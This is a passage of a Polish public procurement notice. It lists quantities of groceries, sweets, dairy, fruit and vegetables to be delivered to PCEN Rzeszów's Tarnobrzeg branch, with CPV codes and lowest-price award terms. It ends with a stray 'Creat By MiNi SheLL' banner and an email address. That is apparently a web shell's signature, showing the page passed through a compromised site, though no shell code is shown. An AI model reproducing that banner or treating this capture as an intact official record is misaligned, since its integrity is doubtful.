drobnomielona opakowanie hermetyczne min.250g 150 szt., Kawa naturalna drobnomielona, opakowanie próżniowe min.250g 25 szt., Kawa naturalna ziarnista do ekspresu, 100% ARABICA opakowanie min. 1000g 2 szt., Kawa rozpuszczalna  typu creme, 100% kawy naturalnej opakowanie min. 180g	20 szt., Kawa rozpuszczalna granulowana 100% kawy naturalnej opakowanie min. 200g 100 szt., Kawa rozpuszczalna liofilizowana (forma łupków, kryształków), 100% kawy naturalnej, opakowanie min. 200g 50 szt., Ketchup opakowanie min. 900g 15 szt., Kiełki soi, puszka min. 400 g 30 szt., Kminek cały, opakowanie  500-650 g 1 szt., Koncentrat barszczu czerwonego, butelka min. 300 ml  30 szt., Koncentrat pomidorowy 30%, opakowanie min. 800g 15 szt., Kukurydza konserwowa, puszka min. 400 g 50 szt., Kwasek cytrynowy spożywczy, opakowanie  min. 500 g 1 szt., Liść laurowy, opakowanie  min. 100 g 10 szt., Majeranek, opakowanie  min. 400 g 1 szt., Majonez  opakowanie min. 300 ml 2 szt., Majonez, opakowanie min. 2,5l 20 szt., Makaron kokardki, opakowanie min. 3kg 5 szt., Makaron łazanki opakowanie min. 3kg 5 szt., Makaron muszelka mała opakowanie, min. 400g 3 szt., Makaron nitki, opakowanie min. 3kg 10 szt., Makaron spaghetti, opakowanie min. 500g 5 szt., Makaron świderki, opakowanie min. 3kg 8 szt., Makaron wstążki, opakowanie min. 3kg 5 szt., Mąka poznańska pszenna, typ 500 opakowanie  1kg 80 kg, Mąka ziemniaczana, opakowanie 0,5 kg 15 szt., Miód pszczeli, opakowanie jednorazowe min. 25g 1000 szt., Morela suszona,  opakowanie min. 200g 15 szt., Musztarda o jednolitej konsystencji, opakowanie min.900g 4 szt., Musztarda w saszetkach, opakowanie 50 szt. x min. 10 g 2 op., Natka pietruszki suszona, opakowanie min. 190 g 3 szt., Ocet  spirytusowy 10% butelka 1l 2 szt., Ogórek kiszony 30 kg, Ogórki konserwowe, słoik  min. 880 g 30 szt., Olej uniwersalny, opakowanie 5l 50 szt., Oliwa z oliwek, opakowanie min. 750ml	6 szt., Oliwki drylowane zielone lub czarne, słoik min.900g 9 szt., Papryka konserwowa, słoik min. 500g 30 szt., Papryka mielona ostra, opakowanie  min. 20 g 15 szt., Papryka mielona słodka, opakowanie  min. 20 g 10 szt., Pasztecik drobiowy, opakowanie jednorazowe  min. 50g 60 szt., Pędy bambusa, puszka minimum 425 g 30 szt., Pieczarki marynowane całe, słoik min. 800g 4 szt., Pieprz czarny mielony, opakowanie min. 0,5 kg 3 szt., Płatki śniadaniowe kukurydziane opakowanie min. 500g 7 szt., Pomidor suszony, opakowanie min. 280 g 10 szt., Przyprawa  sypka do mięsa mielonego, opakowanie min.  650g 1 szt., Przyprawa sypka do gyrosa,  opakowanie min.30g 20 szt., Przyprawa w płynie m.in.. do zup i sosów, opakowanie min. 5l 1 szt., Przyprawa warzywna sypka z cząsteczkami warzyw, opakowanie minimum 1kg 10 szt., Ravioli z serem, opakowanie min. 250g 20 szt., Rodzynki, opakowanie min. 1kg 5 szt., Rosół wołowy w proszku, opakowanie min. 900 g 1 szt., Rosół z kury w proszku, opakowanie min. 1 kg 1 szt., Ryż biały długoziarnisty opakowanie 1kg 30 szt., Seler marynowany w zalewie nitki, słoik min. 300g 6 szt., Sos biały w proszku,  opakowanie min. 25g 30 szt., Sos boloński do spaghetti w proszku, opakowanie min. 0,8 kg 2 szt., Sos deserowy - różne smaki, butelka min. 1kg 4 szt., Sos grzybowy w proszku opakowanie min. 0,8 kg 4 szt., Sos pieczeniowy w proszku, opakowanie min. 850 g 8 szt., Sól spożywcza, opakowanie 1kg 40 szt., Śliwka suszona, opakowanie min. 200g 15 szt., Śmietanka w płynie do kawy, opakowanie 10szt x min.10ml 60 op., Tortelini,  opakowanie min. 250g 6 szt., Tuńczyk w sosie własnym kawałki, puszka min. 170 g 20 szt., Ziele angielskie ziarno, opakowanie 400-600 g 2 szt., Żelatyna spożywcza, opakowanie 1kg 1 szt., Żurek  w proszku opakowanie min. 1kg 5 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4, 15.87.10.00-4, 15.83.00.00-5, 15.87.24.00-5, 15.85.10.00-8, 15.89.10.00-0, 15.89.80.00-9, 15.33.14.27-6, 15.89.40.00-1, 15.33.00.00-0, 15.33.14.00-1, 15.23.50.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa wyrobów czekoladowych i cukierniczych dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baton czekoladowy z nadzieniem o smaku advocat lub toffi lub orzechowym lub czekoladowym lub owocowym, opakowanie min. 40 g 25 szt., Ciastka kruche oblane czekoladą  2 kg, Ciastka kruche maślane 3 kg, Ciastka z ciasta francuskiego nadziewane dżemem owocowym lub czekoladą lub kremem toffi lub budyniem lub masą orzechową  90 kg, Ciastka typu markizy przełożone kremem o smaku śmietankowym lub owocowym lub cappucino lub czekoladowym lub orzechowym 5 kg, Ciastka kruche z marmoladą owocową 2 kg, Ciastka biszkoptowe z galaretką owocową oblane czekoladą białą lub ciemną 100 kg, Ciastka pierniczki w ciemnej czekoladzie z nadzieniem owocowym 10 kg, Ciastka pierniki oblane lukrem 5 kg, Ciastka typu warszawskie tj. ciastka kruche z bezą przekładane marmoladą lub masą o smaku orzechowym 40 kg, Ciastka kruche z bakaliami/czekoladą w środku 5 kg, Ciastka wafelki małe, różne smaki masy, bez polewy 30 kg, Ciastka wafelki małe z masą o różnym smaku - oblane ciemną czekoladą  10 kg, Ciastka wafelki różne smaki masy, oblane czekoladą 20 kg, Ciastka - pałeczki waflowe z masą o różnym smaku w czekoladzie ciemnej 30 kg, Ciastka kruche z marmoladą lub kawałkami czekolady, opakowanie min. 160g  3 szt., Czekoladki  nadziewane  różnym nadzieniem, osobno zawijane  5 kg, Rogalik z ciasta francuskiego z nadzieniem, opakowanie min. 45 g 30 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-2, 15.84.22.00-4, 15.84.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywna dostawa produktów mleczarskich dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt grecki, opakowanie  min. 350 g 5 szt., Jogurt naturalny, opakowanie min. 340 g 10 szt., Jogurt owocowy mix smaków, opakowanie min. 150 g 1700 szt., Masło extra, zawartość tłuszczu min. 82 %, opakowanie min. 200 g 450 szt., Mleko UHT 2%, karton z możliwością wielokrotnego otwierania i zamykania - 1l 300 szt., Ser biały półtłusty 70 kg, Ser miękki w kostce sałatkowo-kanapkowy, opakowanie min. 200g 30 szt., Ser typu mozarella, opakowanie min. 125 g 8 szt., Ser żółty typu edamski 25 kg, Ser żółty typu gouda 40 kg, Serek topiony minimum 8 porcji krążek, różne smaki, opakowanie min. 140 g 15 op., Serek ziarnisty, opakowanie min. 200 g 10 szt., Ser camembert, opakowanie min. 120g 20 szt., Śmietana 18%, opakowanie min. 200g 300 szt., Śmietana 22%, opakowanie min. 200g 10 szt.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywna dostawa owoców i warzyw dla potrzeb PCEN w Rzeszowie Oddział w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banan 40 kg, Brokuł 15 szt., Brzoskwinia 20 kg, Burak czerwony 80 kg, Cebula sucha 100 kg, Cytryna 40 kg, Czosnek główka, uprawiany w krajach Unii Europejskiej 50 szt., Fasola typu jaś średniej wielkości 2 kg, Jabłka słodkie deserowe średniej wielkości 30 kg, Kalafior 5 szt., Kapusta biała głowiasta 100 kg, Kapusta pekińska 60 szt., Kiwi 2 kg, Koperek świeży - pęczek 100 szt., Mandarynka 150 kg, Marchew średniej wielkości 100 kg, Melon 10 szt., Nektarynka 10 kg, Ogórek szklarniowy średniej wielkości 100 kg, Papryka czerwona 50 kg, Pieczarka 20 kg, Pietruszka korzeń średniej wielkości 15 kg, Pietruszka natka pęczek 150 szt., Pomidor 150 kg, Pomidor koktajlowy, opakowanie min. 0,5 kg 20 op., Por 10 szt., Rzodkiewka pęczek 40 szt., Sałata lodowa 30 szt., Sałata zielona 130 szt., Seler naciowy pęczek 5 szt.,Seler średniej wielkości 40 kg, Szczypior pęczek 100 szt., Winogrono duże słodkie - białe lub ciemne 10 kg, Ziemniaki jadalne (jednoodmianowe dostawy) średniej wielkości 400 kg, Ziemniaki jadalne młode (jednoodmianowe dostawy) średniej wielkości 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.21.10-7, 03.22.23.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com